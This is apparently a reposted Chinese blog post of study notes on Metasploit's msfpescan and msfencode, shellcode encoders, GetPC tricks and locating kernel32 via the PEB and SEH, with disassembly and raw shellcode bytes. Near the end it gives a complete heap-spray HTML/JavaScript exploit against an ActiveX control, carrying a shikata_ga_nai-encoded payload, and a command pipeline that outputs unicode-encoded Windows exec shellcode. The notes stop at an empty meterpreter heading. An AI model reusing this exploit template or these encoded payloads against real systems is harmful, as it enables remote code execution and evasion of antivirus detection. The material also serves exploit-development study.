matasploit+shellcode编码学习
来源:互联网 发布:广州市知用中学分数线 编辑:程序博客网 时间:2024/04/27 22:16
msfpescan ,msfencode 等命令使用
首先下面额指令都是我用到时记录的,可以说是经常用到吧
先找到memdump.exe文件:
C:\Program Files\Metasploit\Framework3\msf3\tools\memdump\memdump.exe
在CMD下 运行 memdump.exe 进程PID c:\abc
然后进入console
运行 msfpescan -p -m c:/abc > 1.txt 妈个蛋 要安装ruby 不安装了·······直接用msfpescan -p xx.dll我还觉得方便些
eg: msfpescan player.dll -p 搜索DLL中所有pop pop ret 指令
Usage: /msf3/msfpescan [mode] <options> [targets]Modes: -j, --jump [regA,regB,regC] Search for jump equivalent instructions -p, --poppopret Search for pop+pop+ret combinations -r, --regex [regex] Search for regex match -a, --analyze-address [address] Display the code at the specified address -b, --analyze-offset [offset] Display the code at the specified offset -f, --fingerprint Attempt to identify the packer/compiler -i, --info Display detailed information about the image -R, --ripper [directory] Rip all module resources to disk --context-map [directory] Generate context-map filesOptions: -M, --memdump The targets are memdump.exe directories -A, --after [bytes] Number of bytes to show after match (-a/-b) -B, --before [bytes] Number of bytes to show before match (-a/-b) -D, --disasm Disassemble the bytes at this address -I, --image-base [address] Specify an alternate ImageBase -F, --filter-addresses [regex] Filter addresses based on a regular expression -h, --help Show this message
下面学习用 msfencode 加密shellcode 的方法:
root@bt:/opt/framework/msf3# ./msfencode -h Usage: ./msfencode <options>OPTIONS: -a <opt> The architecture to encode as -b <opt> The list of characters to avoid: '\x00\xff' -c <opt> The number of times to encode the data -d <opt> Specify the directory in which to look for EXE templates -e <opt> The encoder to use -h Help banner -i <opt> Encode the contents of the supplied file path -k Keep template working; run payload in new thread (use with -x) -l List available encoders -m <opt> Specifies an additional module search path -n Dump encoder information -o <opt> The output file -p <opt> The platform to encode for -s <opt> The maximum size of the encoded data -t <opt> The output format: raw,ruby,rb,perl,pl,c,js_be,js_le,java,dll,exe,exe-small,elf,macho,vba,vbs,loop-vbs,asp,war -v Increase verbosity -x <opt> Specify an alternate executable template
root@bt:/opt/framework/msf3# ./msfencode -lFramework Encoders================== Name Rank Description ---- ---- ----------- cmd/generic_sh good Generic Shell Variable Substitution Command Encoder cmd/ifs low Generic ${IFS} Substitution Command Encoder cmd/printf_php_mq manual printf(1) via PHP magic_quotes Utility Command Encoder generic/none normal The "none" Encoder mipsbe/longxor normal XOR Encoder mipsle/longxor normal XOR Encoder php/base64 great PHP Base64 encoder ppc/longxor normal PPC LongXOR Encoder ppc/longxor_tag normal PPC LongXOR Encoder sparc/longxor_tag normal SPARC DWORD XOR Encoder x64/xor normal XOR Encoder x86/alpha_mixed low Alpha2 Alphanumeric Mixedcase Encoder x86/alpha_upper low Alpha2 Alphanumeric Uppercase Encoder x86/avoid_utf8_tolower manual Avoid UTF8/tolower x86/call4_dword_xor normal Call+4 Dword XOR Encoder x86/context_cpuid manual CPUID-based Context Keyed Payload Encoder x86/context_stat manual stat(2)-based Context Keyed Payload Encoder x86/context_time manual time(2)-based Context Keyed Payload Encoder x86/countdown normal Single-byte XOR Countdown Encoder x86/fnstenv_mov normal Variable-length Fnstenv/mov Dword XOR Encoder x86/jmp_call_additive normal Jump/Call XOR Additive Feedback Encoder x86/nonalpha low Non-Alpha Encoder x86/nonupper low Non-Upper Encoder x86/shikata_ga_nai excellent Polymorphic XOR Additive Feedback Encoder x86/single_static_bit manual Single Static Bit x86/unicode_mixed manual Alpha2 Alphanumeric Unicode Mixedcase Encoder x86/unicode_upper manual Alpha2 Alphanumeric Unicode Uppercase Encoder学习几种shellcode编码/加密方式:
每次得到的shellcode 都不相同了, 放在ESI 中的值,得到解码器起始地址的指令位置,记录位置的寄存器 ,循环前面的指令,变量的值都变了
1) x86/shikata_ga_nai
00427400 BA 99B20D32 mov edx,0x320DB29900427405 DBC9 fcmovne st,st(1)00427407 D97424 F4 fstenv (28-byte) ptr ss:[esp-0xC] //这句代码得到解码器第一个FPU指令的地址,这个指令能工作的必备条件是前面至少有个FPU指令被执行 //可以是 fcmovne st,st(1) fldpi fldzffree st(3) fcmovnb st,st fcmovnbe st,st(5)0042740B 5D pop ebp0042740C 29C9 sub ecx,ecx0042740E B1 46 mov cl,0x4600427410 3155 13 xor dword ptr ss:[ebp+0x13],edx //xor 解码00427413 83C5 04 add ebp,0x400427416 0355 96 add edx,dword ptr ss:[ebp-0x6A]00427419 ^\E2 F5 loopd Xtest1231.00427410 //用LOOP 去循环取值
2)x86/alpha_mixed 主要思想是 重新产生原始代码(通过一个循环)
00427400 > 89E0 mov eax,esp00427402 DBD3 fcmovnbe st,st(3)00427404 D970 F4 fstenv (28-byte) ptr ds:[eax-0xC]00427407 5D pop ebp00427408 55 push ebp00427409 59 pop ecx0042740A 49 dec ecx0042740B 49 dec ecx0042740C 49 dec ecx0042740D 49 dec ecx0042740E 49 dec ecx0042740F 49 dec ecx00427410 49 dec ecx00427411 49 dec ecx00427412 49 dec ecx00427413 49 dec ecx00427414 43 inc ebx00427415 43 inc ebx00427416 43 inc ebx00427417 43 inc ebx00427418 43 inc ebx00427419 43 inc ebx0042741A 37 aaa0042741B 51 push ecx0042741C 5A pop edx0042741D 6A 41 push 0x410042741F 58 pop eax00427420 50 push eax00427421 3041 30 xor byte ptr ds:[ecx+0x30],al00427424 41 inc ecx00427425 6B41 41 10 imul eax,dword ptr ds:[ecx+0x41],0x1000427429 3241 42 xor al,byte ptr ds:[ecx+0x42]0042742C 3242 42 xor al,byte ptr ds:[edx+0x42]0042742F 3042 42 xor byte ptr ds:[edx+0x42],al00427432 41 inc ecx00427433 42 inc edx00427434 58 pop eax00427435 50 push eax00427436 3841 42 cmp byte ptr ds:[ecx+0x42],al00427439 ^ 75 E9 jnz Xtest1231.00427424
3)x86/fnstenv_mov 还是解密 产生原始代码
00427400 > 6A 3F push 0x3F00427402 59 pop ecx00427403 D9EE fldz00427405 D97424 F4 fstenv (28-byte) ptr ss:[esp-0xC] ;都是通过这两条获取当前地址 去操作解密的00427409 5B pop ebx0042740A 8173 13 413EFDC>xor dword ptr ds:[ebx+0x13],0xC3FD3E41 ; Decrypt ->0042741600427411 83EB FC sub ebx,-0x400427414 ^ E2 F4 loopd Xtest1231.0042740A00427416 D9EB fldpi
4) x86/call4_dword_xor
00427400 > 31C9 xor ecx,ecx00427402 83E9 C1 sub ecx,-0x3F00427405 E8 FFFFFFFF call test1231.00427409 ;这个就不同于上面的 这个是call 得到下一条语句地址0042740A C05E 81 76 rcr byte ptr ds:[esi-0x7F],0x76 ; 0042740E 0E push cs0042740F D6 salc00427410 8A28 mov ch,byte ptr ds:[eax]00427412 AC lods byte ptr ds:[esi]00427413 83EE FC sub esi,-0x400427416 ^ E2 F4 loopd Xtest1231.0042740C
5)skylined alpha3
http://bbs.pediy.com/showthread.php?t=156913 用的 半斤八两 集合的 MFC 用的就是这个编码器
~~~小知识 修改MFC 左上角 图标
HICON m_hIcon;
m_hIcon = AfxGetApp()->LoadIcon(IDI_ICON1); //为资源ID 。改成其他图标就用对应的资源ID
SetIcon(m_hIcon, TRUE);
注意使用它时必须 eip 指向 eax 指向 shellcode 起始
可以全部转换为 可视代码~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
00427400 50 push eax ;eax首先就指向 shellcode 起始地址第一字节00427401 59 pop ecx00427402 49 dec ecx00427403 49 dec ecx00427404 49 dec ecx00427405 49 dec ecx00427406 49 dec ecx00427407 49 dec ecx00427408 49 dec ecx00427409 49 dec ecx0042740A 49 dec ecx0042740B 49 dec ecx0042740C 49 dec ecx0042740D 49 dec ecx0042740E 49 dec ecx0042740F 49 dec ecx00427410 49 dec ecx00427411 49 dec ecx00427412 37 aaa00427413 51 push ecx00427414 5A pop edx00427415 6A 41 push 0x4100427417 58 pop eax00427418 50 push eax00427419 3041 30 xor byte ptr ds:[ecx+0x30],al0042741C 41 inc ecx0042741D 6B41 41 10 imul eax,dword ptr ds:[ecx+0x41],0x1000427421 3241 42 xor al,byte ptr ds:[ecx+0x42]00427424 3242 42 xor al,byte ptr ds:[edx+0x42]00427427 3042 42 xor byte ptr ds:[edx+0x42],al0042742A 41 inc ecx0042742B 42 inc edx0042742C 58 pop eax0042742D 50 push eax0042742E 3841 42 cmp byte ptr ds:[ecx+0x42],al00427431 ^ 75 E9 jnz Xtest1231.0042741C~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
GETPC方式~~~~~~~~~~~~~~~~~~~~~~~
1) call $+4 (注意call $+5不好用)
00427400 E8 FFFFFFFF call test1231.00427404 ;jmp 到 00427404 FFC3 inc ebx 不影响,然后 pop ecx 即可把00427405 返回到 ecx00427405 C3 retn00427406 59 pop ecx
2) FSTENV
00427403 D9EE fldz ;一个FPU指令00427405 D97424 F4 fstenv (28-byte) ptr ss:[esp-0xC] ;会在第一条指令执行之后保存浮点芯片的状态。第一条指令的地址保存在 0xc的偏移量处。 然后一个pop 即可保存地址
3)Backward call
00427400 /EB 03 jmp Xtest1231.00427405 ;1)jmp00427402 |5E pop esi<span style="white-space:pre"></span> <span style="white-space:pre"></span> 3);弹出esi为 <span style="font-family: Arial, Helvetica, sans-serif;">0042740A</span>00427403 |FFD6 call esi 4)保存00427405 到esp 并且继续执行<span style="font-family: Arial, Helvetica, sans-serif;">0042740A</span><span style="font-family: Arial, Helvetica, sans-serif;"> </span>00427405 \E8 F8FFFFFF call test1231.00427402 ;2)保存 下一条地址 0042740A到 esp0042740A 49 dec ecx ; test1231.004274054) seh getpc
寻找kernel32.dll 因为 我们想找 LoadLibrary 和 GetProcAddress
lkd> dt _pebnt!_PEB +0x000 InheritedAddressSpace : UChar +0x001 ReadImageFileExecOptions : UChar +0x002 BeingDebugged : UChar +0x003 SpareBool : UChar +0x004 Mutant : Ptr32 Void +0x008 ImageBaseAddress : Ptr32 Void +0x00c Ldr : Ptr32 _PEB_LDR_DATA +0x010 ProcessParameters : Ptr32 _RTL_USER_PROCESS_PARAMETERS +0x014 SubSystemData : Ptr32 Void ··········
lkd> dt _PEB_LDR_DATA<span style="white-space:pre"></span>nt!_PEB_LDR_DATA +0x000 Length : Uint4B +0x004 Initialized : UChar +0x008 SsHandle : Ptr32 Void +0x00c InLoadOrderModuleList : _LIST_ENTRY +0x014 InMemoryOrderModuleList : _LIST_ENTRY +0x01c InInitializationOrderModuleList : _LIST_ENTRY +0x024 EntryInProgress : Ptr32 Void
lkd> dt _ldr_data_table_entry nt!_LDR_DATA_TABLE_ENTRY +0x000 InLoadOrderLinks : _LIST_ENTRY +0x008 InMemoryOrderLinks : _LIST_ENTRY +0x010 InInitializationOrderLinks : _LIST_ENTRY +0x018 DllBase : Ptr32 Void +0x01c EntryPoint : Ptr32 Void +0x020 SizeOfImage : Uint4B +0x024 FullDllName : _UNICODE_STRING +0x02c BaseDllName : _UNICODE_STRING +0x034 Flags : Uint4B `````````````````
lkd> dt _UNICODE_STRINGnt!_UNICODE_STRING +0x000 Length : Uint2B +0x002 MaximumLength : Uint2B +0x004 Buffer : Ptr32 Uint2B
1) 通过PEB
(1)通过 ldr + 0xc InLoadOrderModuleList 结构 通用~~~~~~
0040D4AF |. 33D2 xor edx,edx0040D4B1 |. 64:8B5A 30 mov ebx,dword ptr fs:[edx+0x30] ; PEB0040D4B5 |. 8B5B 0C mov ebx,dword ptr ds:[ebx+0xC] ; ldr0040D4B8 |. 8B5B 0C mov ebx,dword ptr ds:[ebx+0xC] ### InLoadOrderModuleList-》_LIST_ENTRY本身就是LDR_DATA_TABLE_ENTRY结构0040D4BB |. 8B1B mov ebx,dword ptr ds:[ebx] ### InLoadOrderLinks -> WIN7:这里 [ebx+0x18] 是地址 SysWOW64\ntdll.dll XP SP3: system32\ntdll.dll0040D4BD |. 8B1B mov ebx,dword ptr ds:[ebx] ### InLoadOrderLinks -> WIN7:这里 [ebx+0x18] 是地址 SysWOW64\kernel32.dll XP SP3: system32\kernel32.dll0040D4BF |. 8B5B 18 mov ebx,dword ptr ds:[ebx+0x18] ; +0x018 DllBase : Ptr32 Void0040D4C2 |. 8BEB mov ebp,ebx ; kernel32.74CB000033 D2 64 8B 5A 30 8B 5B 0C 8B 5B 0C 8B 1B 8B 1B 8B 5B 18 8B EB
(2) 通过 ldr + 0x14 InMemoryOrderModuleList 通用~~~~~~
0040D4AF 33DB xor ebx,ebx0040D4B1 64:8B5B 30 mov ebx,dword ptr fs:[ebx+0x30]0040D4B5 8B5B 0C mov ebx,dword ptr ds:[ebx+0xC] ; ldr0040D4B8 8B5B 14 mov ebx,dword ptr ds:[ebx+0x14] ; InMemoryOrderModuleList0040D4BB 8B1B mov ebx,dword ptr ds:[ebx] ### InMemoryOrderLinks -》 WIN7: 这里 [ebx+0x20] 是地址 SysWOW64\ntdll.dll XP SP3: system32\ntdll.dll0040D4BD 8B1B mov ebx,dword ptr ds:[ebx] ### InMemoryOrderLinks -》 WIN7: 这里 [ebx+0x20] 是地址 SysWOW64\kernel32.dll XP SP3: system32\kernel32.dll0040D4BF 8B5B 10 mov ebx,dword ptr ds:[ebx+0x10] ### [ebx+0x10] 是 DllBase
33 DB 64 8B 5B 30 8B 5B 0C 8B 5B 14 8B 1B 8B 1B 8B 5B 10 8B EB
(3) 下面在 2000也实用,再经构造 对BaseDllName 验证 hash值: 通用~~~~~~
0040D4AF FC cld0040D4B0 33D2 xor edx,edx0040D4B2 64:8B52 30 mov edx,dword ptr fs:[edx+0x30]0040D4B6 8B52 0C mov edx,dword ptr ds:[edx+0xC]0040D4B9 8B52 14 mov edx,dword ptr ds:[edx+0x14] ; InMemoryOrderModuleList0040D4BC 8B72 28 mov esi,dword ptr ds:[edx+0x28] ; BaseDllName -》Buffer0040D4BF 6A 18 push 0x18 ; kernel32.dll length=12*20040D4C1 59 pop ecx0040D4C2 33FF xor edi,edi0040D4C4 33C0 xor eax,eax0040D4C6 AC lods byte ptr ds:[esi]0040D4C7 3C 61 cmp al,0x61 ; cmp al,‘a’0040D4C9 7C 02 jl Xtest1231.0040D4CD0040D4CB 2C 20 sub al,0x200040D4CD C1CF 0D ror edi,0xD0040D4D0 03F8 add edi,eax0040D4D2 ^ E2 F0 loopd Xtest1231.0040D4C40040D4D4 81FF 5BBC4A6A cmp edi,0x6A4ABC5B0040D4DA 8B5A 10 mov ebx,dword ptr ds:[edx+0x10] ; DllBase0040D4DD 8B12 mov edx,dword ptr ds:[edx] ; 下一个InMemoryOrderLinks0040D4DF ^ 75 DB jnz Xtest1231.0040D4BC ; ebx 为kernerl32.dll基址
FC 33 D2 64 8B 52 30 8B 52 0C 8B 52 14 8B 72 28 6A 18 59 33 FF 33 C0 AC 3C 61 7C 02 2C 20 C1 CF
0D 03 F8 E2 F0 81 FF 5B BC 4A 6A 8B 5A 10 8B 12 75 DB
(4) ldr + 0x1c InInitializationOrderModuleList 通过验证 buffer 长度 通用~~~~~
0040D4AF 33C9 xor ecx,ecx0040D4B1 64:8B71 30 mov esi,dword ptr fs:[ecx+0x30]0040D4B5 8B76 0C mov esi,dword ptr ds:[esi+0xC] ; ldr0040D4B8 8B76 1C mov esi,dword ptr ds:[esi+0x1C] ; InInitializationOrderModuleList0040D4BB 8B6E 08 mov ebp,dword ptr ds:[esi+0x8] ; esi+0x8 = DllBase0040D4BE 8B7E 20 mov edi,dword ptr ds:[esi+0x20] ; esi+0x20 = BaseDllName ->buffer0040D4C1 8B36 mov esi,dword ptr ds:[esi] ; 下一个InInitializationOrderLinks0040D4C3 384F 18 cmp byte ptr ds:[edi+0x18],cl ; modulename[12] == 0? ; len(KERNELBASE.dll)=14 len(kernel32.dll)=120040D4C6 ^ 75 F3 jnz Xtest1231.0040D4BB ; ebp = kernel32基址
33 C9 64 8B 71 30 8B 76 0C 8B 76 1C 8B 6E 08 8B 7E 20 8B 36 38 4F 18 75 F3
(5)不通用 而且 有 00 字节b WIN7 和 xp 有区别 ldr + 0x1c InInitializationOrderModuleList 不 通用~~~~~~
0040D4AF 33C0 xor eax,eax0040D4B1 64:8B40 30 mov eax,dword ptr fs:[eax+0x30]0040D4B5 8B40 0C mov eax,dword ptr ds:[eax+0xC] ; ldr0040D4B8 8B70 1C mov esi,dword ptr ds:[eax+0x1C] ; InInitializationOrderModuleList 0040D4BB AD lods dword ptr ds:[esi] ;InInitializationOrderLinks -> ; WIN7:这里FullDllName [ebx+0x18] 是syswow64\KERNELBASE.dll ; XP SP3: system32\kernel32.dll0040D4BC 8B00 mov eax,dword ptr ds:[eax] ; InInitializationOrderLinks- > ; WIN7:这里FullDllName [ebx+0x18] 是syswow64\kernel32.dll ; XP SP3: 这里 [eax+0x8] 即为 kernerl32.dll基址0040D4BE 8B40 08 mov eax,dword ptr ds:[eax+0x8] ; [eax+0x8] 是DllBase kernel32.74CB0000
win7 是因为 它是 32位程序,所以按32位来编码的
下面为 SEH 知识,复习下
ntdll!_TEB struct _TEB, 66 elements, 0xfb8 bytes +0x000 NtTib : struct _NT_TIB, 8 elements, 0x1c bytes +0x000 ExceptionList : Ptr32 to struct _EXCEPTION_REGISTRATION_RECORD,2 elements, 0x8 bytes +0x000 Next : Ptr32 to struct _EXCEPTION_REGISTRATION_RECORD, 2 elements, 0x8 bytes +0x004 Handler : Ptr32 to _EXCEPTION_DISPOSITION +0x004 StackBase : Ptr32 to Void +0x008 StackLimit : Ptr32 to Void +0x00c SubSystemTib : Ptr32 to Void +0x010 FiberData : Ptr32 to Void +0x010 Version : Uint4B
2) 通过SEH
下面的技术要求 最后一个异常处理函数 0xffffffff 指向 kernel32.dll ,所以查找可让kernel32里面的指针后,
要做的就是往回循环到内核的顶部,比较前两个字节。
如果最后一个异常处理函数没有指向 kewrnel32.dll 这个技术明显会失败
我的 WIN7 失败~~~~~~~~~~~~~~~~~~~
0040D4AF 56 push esi0040D4B0 51 push ecx0040D4B1 33C9 xor ecx,ecx ; ecx = 00040D4B3 64:8B31 mov esi,dword ptr fs:[ecx] ; esi = NtTib =指向nseh的指针0040D4B6 AD lods dword ptr ds:[esi] ; eax = 指向下一个nseh(0xffffffff)的指针0040D4B7 96 xchg eax,esi ; esi =指向下一个nseh(0xffffffff)的指针, eax = NtTib =指向nseh的指针0040D4B8 390E cmp dword ptr ds:[esi],ecx ; nseh == 00040D4BA ^ 79 FA jns Xtest1231.0040D4B60040D4BC AD lods dword ptr ds:[esi] ; eax = ffffffff,esi+4 指向seh0040D4BD AD lods dword ptr ds:[esi] ; eax = seh地址0040D4BE 48 dec eax0040D4BF 66:33C0 xor ax,ax0040D4C2 66:8138 4D5A cmp word ptr ds:[eax],0x5A4D0040D4C7 ^ 75 F5 jnz Xtest1231.0040D4BE ; eax=ntdll.dll基址0040D4C9 59 pop ecx0040D4CA 5E pop esi0040D4CB C3 retn
56 51 33 C9 64 8B 31 AD 96 39 0E 79 FA AD AD 48 66 33 C0 66 81 38 4D 5A 75 F5 59 5E C3
3) TOPSTACK TEB
XP SP3 行得通 WIN7不行~~~~~
0044F611 > 56 push esi0044F612 33F6 xor esi,esi0044F614 64:8B46 04 mov eax,dword ptr fs:[esi+0x4]0044F618 8B40 E4 mov eax,dword ptr ds:[eax-0x1C] ; hander0044F61B 48 dec eax ; kernel32._except_handler3; SE 处理程序安装0044F61C 66:33C0 xor ax,ax0044F61F 66:8138 4D5A cmp word ptr ds:[eax],0x5A4D0044F624 ^ 75 F5 jnz X表白专用.0044F61B0044F626 5E pop esi0044F627 C3 retn
56 33 F6 64 8B 46 04 8B 40 E4 48 66 33 C0 66 81 38 4D 5A 75 F5 5E C3
解释一下: 顶层一场处理结构体总是安排在线程堆栈最高端再-20h处
UNICODE 编码学习~~~~~~:
root@bt:/opt/framework/msf3# ./msfencode -i /root/Desktop/1.dat -c 1 -b '\x00' -e x86/shikata_ga_nai -t js_le[*] x86/shikata_ga_nai succeeded with size 195 (iteration=1)%uc3d9%u74d9%uf424%uf1b8%u721d%u5dcc%uc929%u2bb1%uc583%u3104%u1345%ub403%u900e%uca39%u3e59%u0ac8%ud684%ue3af%u6969%uc158%ue7fd%uae94%u8a0a%u44db%u4ec1%ua094%u920d%u13bd%u6662%u0b11%uf5f0%ub9f0%ucaae%u5928%u77c4%u2afd%u8b91%u6576%u1f3a%ufe81%u172b%u3d3f%u2dc6%u2307%u3763%ua4e2%ucfdc%u3a99%u6a68%u319e%u7022%u46a6%uf176%u680f%udb8b%u9783%u68cc%udcd7%u9bd0%u2d81%u6569%uf588%u62e1%u3f2d%u700e%uf97d%u87fa%u5146%u7bd9%ubdcc%uddaa%u3e0a%ubb70%u7cd9%ucff1%u6087%u0d06%ub434%u38b3%u6f64%u2394%u05a6%u9c11%uacc6%uef8c%u1d2d%u6ba7%u91b3%u1c14%u8110%ub23b%ue5dd%u1aef%ub6b2%uccf0%u6bce%ua4f0%u41d6
可以用··················· 可以设置 不要 bad characters
<object classid='clsid:2355C601-37D1-42B4-BEB1-03C773298DC8' id='target' /></object> <script> var nop = unescape("%u9090"); var shellcode=unescape("%uc3d9%u74d9%uf424%uf1b8%u721d%u5dcc%uc929%u2bb1%uc583%u3104%u1345%ub403%u900e%uca39%u3e59%u0ac8%ud684%ue3af%u6969%uc158%ue7fd%uae94%u8a0a%u44db%u4ec1%ua094%u920d%u13bd%u6662%u0b11%uf5f0%ub9f0%ucaae%u5928%u77c4%u2afd%u8b91%u6576%u1f3a%ufe81%u172b%u3d3f%u2dc6%u2307%u3763%ua4e2%ucfdc%u3a99%u6a68%u319e%u7022%u46a6%uf176%u680f%udb8b%u9783%u68cc%udcd7%u9bd0%u2d81%u6569%uf588%u62e1%u3f2d%u700e%uf97d%u87fa%u5146%u7bd9%ubdcc%uddaa%u3e0a%ubb70%u7cd9%ucff1%u6087%u0d06%ub434%u38b3%u6f64%u2394%u05a6%u9c11%uacc6%uef8c%u1d2d%u6ba7%u91b3%u1c14%u8110%ub23b%ue5dd%u1aef%ub6b2%uccf0%u6bce%ua4f0%u41d6")while (nop.length < 0x100000/2) {nop += nop;} nop=nop.substring(0,0x100000-32/2-4/2-2/2-1-shellcode.length); nop =nop+ shellcode; var memory = new Array(); for (var i=0;i<200;i++) {memory[i] += nop;} arg1='\x0a';while(arg1.length < 2000){arg1 += '\x0c';}arg2 = '\x0c\x0c\x0c\x0c';arg1 = arg1 + arg2;target.Data = arg1;</script> 用msfencode 生成 unicode shellcode
root@bt:/opt/framework/msf3# ./msfpayload windows/exec CMD=calc R |> ./msfencode -e x86/alpha_mixed -t raw | > ./msfencode -e x86/unicode_upper BufferRegister=EAX -t perl[*] x86/alpha_mixed succeeded with size 454 (iteration=1)[*] x86/unicode_upper succeeded with size 1039 (iteration=1)my $buf = "\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41\x51\x41" ."\x54\x41\x58\x41\x5a\x41\x50\x55\x33\x51\x41\x44\x41\x5a" ."\x41\x42\x41\x52\x41\x4c\x41\x59\x41\x49\x41\x51\x41\x49" ."\x41\x51\x41\x50\x41\x35\x41\x41\x41\x50\x41\x5a\x31\x41" ."\x49\x31\x41\x49\x41\x49\x41\x4a\x31\x31\x41\x49\x41\x49" ."\x41\x58\x41\x35\x38\x41\x41\x50\x41\x5a\x41\x42\x41\x42" ."\x51\x49\x31\x41\x49\x51\x49\x41\x49\x51\x49\x31\x31\x31" ."\x31\x41\x49\x41\x4a\x51\x49\x31\x41\x59\x41\x5a\x42\x41" ."\x42\x41\x42\x41\x42\x41\x42\x33\x30\x41\x50\x42\x39\x34" ."\x34\x4a\x42\x54\x49\x4b\x31\x49\x4b\x58\x4e\x49\x49\x52" ."\x51\x5a\x54\x51\x4e\x50\x56\x52\x39\x50\x49\x50\x49\x51" ."\x39\x50\x49\x51\x39\x51\x39\x50\x49\x51\x39\x50\x49\x50" ."\x49\x51\x33\x51\x33\x50\x43\x50\x43\x50\x43\x50\x43\x50" ."\x37\x52\x31\x51\x4a\x51\x5a\x51\x31\x50\x58\x50\x50\x50" ."\x30\x51\x31\x50\x30\x51\x31\x52\x4b\x51\x31\x51\x31\x50" ."\x51\x50\x32\x51\x31\x50\x42\x50\x32\x51\x32\x51\x32\x50" ."\x30\x51\x32\x50\x42\x51\x31\x51\x32\x50\x58\x52\x30\x50" ."\x38\x51\x31\x50\x42\x54\x35\x50\x4a\x51\x39\x50\x49\x52" ."\x4c\x50\x4b\x51\x48\x50\x4e\x43\x39\x50\x43\x50\x30\x50" ."\x45\x52\x30\x51\x37\x54\x30\x51\x33\x50\x50\x50\x4d\x50" ."\x59\x50\x49\x43\x45\x51\x46\x52\x31\x52\x38\x51\x42\x51" ."\x33\x50\x54\x50\x4c\x50\x4b\x50\x52\x43\x42\x52\x36\x50" ."\x50\x50\x4c\x50\x4b\x51\x33\x51\x52\x50\x54\x50\x4c\x50" ."\x4e\x52\x4b\x50\x52\x52\x52\x51\x46\x43\x44\x50\x4c\x50" ."\x4b\x51\x44\x50\x32\x50\x45\x43\x48\x50\x56\x52\x4f\x50" ."\x4d\x43\x37\x50\x52\x52\x4a\x50\x56\x50\x46\x51\x46\x50" ."\x51\x51\x39\x52\x4f\x50\x50\x50\x31\x51\x39\x52\x30\x50" ."\x4e\x50\x4c\x51\x37\x50\x4c\x50\x50\x51\x51\x50\x51\x52" ."\x4c\x51\x37\x52\x52\x50\x56\x50\x4c\x50\x45\x52\x50\x51" ."\x39\x52\x31\x52\x38\x50\x4f\x50\x56\x52\x4d\x50\x45\x50" ."\x51\x50\x49\x51\x47\x51\x39\x43\x42\x50\x4c\x50\x30\x51" ."\x42\x52\x52\x50\x43\x52\x47\x50\x4e\x52\x4b\x50\x51\x51" ."\x32\x52\x32\x50\x30\x50\x4e\x52\x4b\x50\x43\x43\x42\x50" ."\x45\x52\x4c\x50\x56\x51\x51\x51\x4a\x52\x50\x50\x4c\x50" ."\x4b\x50\x51\x52\x30\x52\x32\x51\x48\x50\x4c\x50\x45\x50" ."\x4b\x52\x50\x50\x52\x52\x34\x52\x30\x50\x4a\x50\x45\x52" ."\x31\x52\x38\x52\x30\x52\x30\x50\x50\x50\x4c\x50\x4b\x51" ."\x33\x54\x38\x50\x47\x52\x48\x50\x4c\x50\x4b\x50\x43\x43" ."\x38\x50\x45\x54\x30\x52\x36\x51\x51\x50\x49\x50\x43\x50" ."\x4d\x50\x33\x51\x37\x50\x4c\x52\x31\x51\x49\x50\x4e\x52" ."\x4b\x52\x36\x52\x34\x50\x4e\x52\x4b\x50\x45\x52\x31\x52" ."\x38\x51\x46\x50\x45\x51\x51\x50\x4b\x50\x4f\x52\x34\x52" ."\x51\x50\x4f\x50\x30\x50\x4e\x50\x4c\x50\x4f\x50\x31\x50" ."\x58\x50\x4f\x52\x36\x52\x4d\x51\x33\x50\x31\x50\x4f\x50" ."\x37\x50\x50\x50\x38\x50\x4d\x50\x30\x50\x43\x51\x35\x51" ."\x48\x54\x34\x51\x44\x50\x43\x50\x43\x50\x4d\x51\x4a\x50" ."\x58\x50\x47\x50\x4b\x50\x51\x52\x4d\x52\x31\x50\x34\x50" ."\x54\x50\x35\x50\x58\x52\x42\x50\x50\x52\x38\x50\x4e\x52" ."\x4b\x50\x56\x50\x38\x51\x35\x54\x34\x51\x35\x50\x51\x51" ."\x48\x50\x53\x52\x30\x43\x36\x50\x4c\x50\x4b\x51\x46\x52" ."\x4c\x52\x32\x52\x4b\x50\x4e\x52\x4b\x50\x50\x52\x38\x51" ."\x35\x50\x4c\x51\x37\x52\x51\x50\x49\x50\x43\x50\x4c\x50" ."\x4b\x50\x47\x54\x34\x50\x4e\x52\x4b\x51\x37\x54\x31\x50" ."\x4e\x50\x30\x50\x4e\x43\x39\x50\x52\x52\x44\x51\x37\x51" ."\x44\x50\x51\x50\x34\x50\x51\x50\x4b\x52\x31\x50\x4b\x50" ."\x45\x50\x31\x50\x50\x50\x59\x51\x33\x51\x5a\x52\x32\x52" ."\x51\x51\x39\x52\x4f\x50\x4b\x50\x50\x52\x30\x51\x48\x51" ."\x33\x52\x4f\x51\x42\x52\x5a\x50\x4c\x50\x4b\x50\x45\x50" ."\x42\x50\x5a\x50\x4b\x50\x4d\x52\x36\x50\x51\x50\x4d\x51" ."\x33\x50\x5a\x50\x47\x52\x51\x50\x4e\x52\x4d\x50\x4f\x52" ."\x55\x50\x4e\x51\x49\x51\x33\x50\x30\x51\x37\x54\x30\x51" ."\x33\x50\x30\x52\x30\x50\x50\x50\x51\x43\x48\x50\x50\x50" ."\x31\x50\x4e\x52\x4b\x50\x50\x52\x4f\x50\x4f\x43\x47\x50" ."\x4b\x50\x4f\x50\x58\x52\x35\x50\x4d\x52\x4b\x50\x4c\x50" ."\x30\x50\x4e\x51\x45\x50\x4f\x52\x32\x50\x51\x50\x46\x50" ."\x43\x51\x48\x50\x4f\x51\x46\x50\x5a\x50\x35\x50\x4d\x52" ."\x4d\x50\x4d\x50\x4d\x50\x4b\x50\x4f\x50\x4b\x43\x35\x50" ."\x47\x50\x4c\x51\x37\x54\x36\x50\x43\x50\x4c\x50\x54\x50" ."\x4a\x50\x4f\x52\x50\x51\x39\x52\x4b\x50\x4b\x52\x30\x51" ."\x33\x50\x45\x50\x47\x52\x55\x50\x4f\x50\x4b\x50\x43\x54" ."\x37\x50\x54\x52\x33\x51\x44\x50\x32\x50\x50\x52\x4f\x51" ."\x42\x50\x4a\x50\x43\x50\x30\x52\x30\x51\x43\x50\x49\x52" ."\x4f\x50\x58\x51\x45\x51\x35\x50\x33\x52\x31\x54\x31\x50" ."\x50\x52\x4c\x50\x45\x50\x33\x51\x33\x50\x30\x51\x31\x51" ."\x31\x41\x41";
meterpreter 使用 情况学习:
